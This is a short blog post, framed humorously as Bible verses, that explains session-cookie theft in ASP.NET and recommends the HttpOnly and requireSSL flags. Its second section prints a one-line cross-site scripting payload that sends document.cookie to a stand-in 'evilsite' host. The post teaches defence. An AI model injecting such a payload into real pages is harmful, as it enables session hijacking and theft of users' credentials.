Sunday, February 5, 2023

Why Cookie can turn into Monster?

I'm reading some verse from Bible and I know you all are on right path to god(Secure) not to Demon(Hacker). Please give thumps Up if you read this with your full faith and believe in HTTP Only Secure Cookie - Http +SSL

🫳

Chapter 1 Verse #1

Here’s an example: when you log on to an ASP.NET application using forms authentication, the default implementation will return you a cookie named “.ASPXAUTH”. It looks just like this:

Set-Cookie: .ASPXAUTH=737A8033B7A68EF4C1D3AC5C96353E9767EF677903AD7F796C1BF0D8DDE141EDC98451CF6A67837D29E12A722252BA93C7342D11341BAC2D49031923BA2DFD6ADCB04BDED56A685A7417353F81B04BECFEA4F3522CCBD86C0371A6EB75B6FF74

The contents of this cookie then travel back to the server on every request you make hence identifying you as the person who logged on earlier. The problem with this is that if an attacker can gain access to that cookie, they can steal your session or in other words, set the cookie in their own browser, go to the website and now the website thinks they’re you.

Chapter 2 Verse #2

Here’s an example: let’s imagine you have a website that has a cross site scripting vulnerability (remember, this is still number 2 on the Top 10 web application security risks and is extremely prevalent) and that an attacker can add arbitrary JavaScript to your page so they do this:

location.href = 'http://evilsite/?cookies=' + document.cookie;

What will happen is that the browser will happily redirect the unsuspecting user to the evil site and send all their cookies with the request. Those cookies may hold sensitive information – including authentication information – which the site may then harvest and use to hijack sessions. It really is that easy and whilst that example is rather rudimentary, much more elegant solutions exist which enable those cookies to be siphoned off without the user ever observing any odd behaviour on the website.

God has its own way -- Secure http only Http + SSL

What we need is a way to stop the browser from being able to access cookies on the client side and this is where the HTTP only flag comes in.

httpCookies httpOnlyCookies="true" requireSSL="true"

No comments :